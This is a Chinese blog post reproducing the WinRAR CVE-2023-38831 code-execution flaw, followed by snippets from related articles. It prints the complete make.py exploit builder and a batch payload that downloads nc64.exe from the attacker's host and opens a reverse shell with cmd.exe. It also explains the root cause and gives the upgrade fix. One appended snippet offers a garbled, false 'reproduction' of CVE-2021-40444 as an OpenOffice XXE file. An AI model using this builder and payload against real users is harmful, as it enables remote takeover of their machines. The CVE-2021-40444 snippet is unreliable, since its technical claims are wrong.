CVE-2023-38831 WinRAR代码执行漏洞复现

于 2025-02-20 21:19:55 发布
阅读量1k 收藏 8
点赞数 24
分类专栏: 漏洞复现 文章标签: winrar 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hcja666/article/details/145762648
版权

_

基本信息介绍

WinRAR是一款功能强大的Windows文件压缩和解压缩工具,支持高效的压缩算法、密码保护、分卷压缩、恢复记录等功能,同时提供图形和命令行界面,以及自解压缩功能,为用户提供便捷且安全的文件管理和传输工具。
WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。
漏洞类型:代码注入。
发现时间:2023 年。
漏洞等级:高危。
影响版本:WinRAR 版本 6.23 之前的版本。

https://www.secrss.com/articles/58122
(引自安全内参)

复现

先在win10虚拟机安装6.22版WinRAR。并准备一个正常文件,比如一张图片。
接着写一个bat文件,里面是要执行的命令,因为我这里测试的是反弹shell命令,所以我还下了一个windows的nc64.exe,放到kali上面,然后在nc的目录下python开一个服务器

在这里插入图片描述在这里插入图片描述

curl http://192.168.6.128:8880/nc64.exe -O nc64.exe & nc64.exe 192.168.6.128 4444 -e cmd.exe -d & test.png

然后利用公开的exp
make.py

import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "poc.zip"

BAIT_NAME = "test.png"
SCRIPT_NAME = "script.bat"

if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\make.py poc
          python .\make.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()

BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)

shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

os.remove(TEMPLATE_NAME + ".zip")

with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)

print("ok..")

一共三个文件,加上kali的nc64.exe
在这里插入图片描述

执行python make.py test.png script.bat poc.zip生成恶意的压缩包
在这里插入图片描述
在这里插入图片描述

当用户用有该漏洞的WinRAR打开这个压缩包,并在预览界面点击图片时就会触发命令执行
现在在kali监听4444端口
在这里插入图片描述
双击poc.zip(因为我这默认压缩包软件已经是WinRAR了),点击正常图片文件。发现kali已经获得目标的shell

在这里插入图片描述

漏洞原理及触发条件

构造特殊文件:攻击者构造一个特殊的 zip 档案,其中包含一个良性文件(如普通的.jpg、.pdf 文件)和一个与良性文件同名的文件夹,文件夹内包含恶意的可执行文件,如批处理文件.cmd 等。
利用文件处理机制:当用户使用受影响的 WinRAR 版本打开这个 zip 档案,尝试访问其中的良性文件时,WinRAR 会调用 ShellExecute 函数匹配文件名。由于其处理机制存在缺陷,在匹配过程中,如果目标文件名与文件类型不匹配时,就会执行目标文件中的批处理文件,从而导致恶意代码被执行。
在正常情况下,ShellExecute 应该根据文件的完整路径和类型准确地打开目标文件。然而,受影响版本的 WinRAR 在处理这种特殊结构的压缩包时,其文件名匹配机制存在漏洞。当它在进行文件名匹配时,没有正确区分文件和同名文件夹,导致在某些情况下,即使本意是打开良性文件,却错误地匹配到了同名文件夹内的恶意可执行文件。

简单点说就是用WinRAR打开某个文件时,WinRAR会查找叫该文件名的所有文件,如果匹配到一个同名文件但该文件是个目录,就会进入那个目录查找文件。比如我要用WinRAR打开poc.zip里面的test.png,但是还有个叫test.png的目录也在同一个压缩包,WinRAR就会匹配到这个目录并进里面查找,刚好找到一个test.png .cmd(正常情况是无法创建的,但是exp用了某种方法创建),由于系统会忽略文件名空格后的东西,WinRAR就以为找到了目标图片,并打开,实际上执行的是批处理文件(.cmd)。

在这里插入图片描述

我C学得不是特别好,这个源码调试也不会,只能打一遍看看。搜到一篇源码调试的大佬文章https://www.cnblogs.com/GoodFish-/p/17715977.html,可以去看看。

防御方法

将WinRAR更新至6.23以上。

漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
李火火的安全圈
09-11 1223
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。
漏洞复现CVE-2023-38831 WinRAR代码执行漏洞
信安百科
08-28 445
WinRAR版本6.23之前存在可欺骗文件扩展名的漏洞,可利用该漏洞创建恶意RAR或ZIP存档,这些存档中显示看似无害的诱饵文件,例如 JPG (.jpg) 图像文件、文本文件 (.txt) 或 PDF文档 (.pdf)等文件,以及与文件同名的文件夹(包括文件扩展名),当用户打开这些文件时,将执行文件夹中的恶意脚本,导致在设备上安装恶意软件。
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。 该漏洞产生的根源在于对用户提供的数据缺乏适当的验证,这会引发分配的缓存背后的内存访问。漏洞利用需要用户交互,即攻击者需要访问恶意页面或打开精心伪造的RAR文件。但从实际攻击场景来说,欺骗用户执行必要的交互操作并不难。 RARLAB已于2023年8月2日发布了WinRAR v 6.23版本,建议用户尽快安装安全更新。 鉴于此类漏洞可被用于进一步攻击活动,微软已经开始测试Windows 11系统对RAR、7-Zip和GZ等压缩文件格式的支持,未来系统将无需安装WinRAR这样的第三方软件,以减少可能的攻击面。 CVE-2023-38831漏洞执行的Windows CMD脚本,来源:BleepingComputer 该漏洞是通过创建与安全文件相比结构略有修改的特制存档而触发的,这会导致 WinRAR 的 ShellExecu
CVE-2023-38831 winrar漏洞复现
m0_46624929的博客
09-12 771
1.WinRAR 0day漏洞允许攻击者创建恶意 .RAR 和 .ZIP 存档,这些存档显示看似无害的诱饵文件,例如 JPG (.jpg) 图像、文本文件 (.txt) 或 PDF (.pdf),用户双击使用winRAR打开查看压缩文件,并在winRAR窗口中点击查看时触发漏洞。2.影响版本:WinRar 版本 < 6.23。
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 3963
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
漏洞复现-WinRAR代码执行漏洞
玄道的网安博客
08-13 633
漏洞编号影响版本:RARLabs WinRAR版本在6.23之前漏洞描述:RARLabs WinRAR在6.23版本之前存在一个漏洞,该漏洞允许攻击者在用户尝试查看ZIP存档中的良性文件时执行任意代码。
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。 RARLabs WinRAR 6.23之前版本存在安全漏洞...
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 666
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
winrar(CVE-2023-38831)漏洞分析
4SecNet团队专栏
09-28 963
WinRAR 是一种流行的文件归档程序,全世界有数百万人使用。它可以创建和查看 RAR 或 ZIP 文件格式的存档,并解压多种存档文件格式。WinRAR 支持创建加密、多部分和自解压存档。WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
Asun安全学习【漏洞复现CVE-2023-38831 WinRAR代码执行漏洞
m0_64993865的博客
07-08 1876
学习!!!!!
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
此视频是对与WinRAR 代码执行漏洞的演示视频,因为原漏洞发布厂商并没有发布对应的poc,和演示视频,特录制了视频方便大家观看效果,里面还附带了大家最想要的poc ,希望对大家有帮助
CVE-2023-38831 漏洞
最新发布
weixin_45422672的博客
02-05 358
是一个利用 Windows 10 压缩文件处理机制的漏洞。攻击者可以通过在压缩文件中嵌入恶意脚本或可执行文件,并利用特定的文件名或路径来触发漏洞,从而在用户解压文件时执行恶意代码。
WinRAR代码执行漏洞复现
Cover-3321的博客
01-02 1252
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2581
最近WinRARCVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析
xinyaoyaotu的博客
01-27 2436
网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。CVE - 2023 - 388312023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。
RAR漏洞复现 CVE-2018-20250
R4bbit
03-07 6267
前言: 最近 Check Point安全团队又发现了WinRAR的四个漏洞 ACE文件验证逻辑绕过漏洞 [CVE-2018-20250] ACE文件名逻辑验证绕过漏 [CVE-2018-20251] ACE/RAR文件越界写入漏洞 [CVE-2018-20252] LHA/LZH文件越界写入漏洞 [CVE-2018-20253] 网上流传最多的技术复现细节就是这个ACE文件验证逻辑绕过...
CVE-2018-2025(winrar远程代码执行漏洞
simple___sunny的博客
03-13 2743
漏洞背景: 2019 年 2 月 20 日 Check Point团队爆出了一个关于WinRAR存在19年的漏洞,用它来可以获得受害者计算机的控制。攻击者只需利用此漏洞构造恶意的压缩文件,当受害者使用WinRAR解压该恶意文件时便会触发漏洞WinRAR 代码执行相关的 CVE 编号如下: CVE-2018-20250, CVE-2018-20251, CVE-2018-2025...
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux中复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值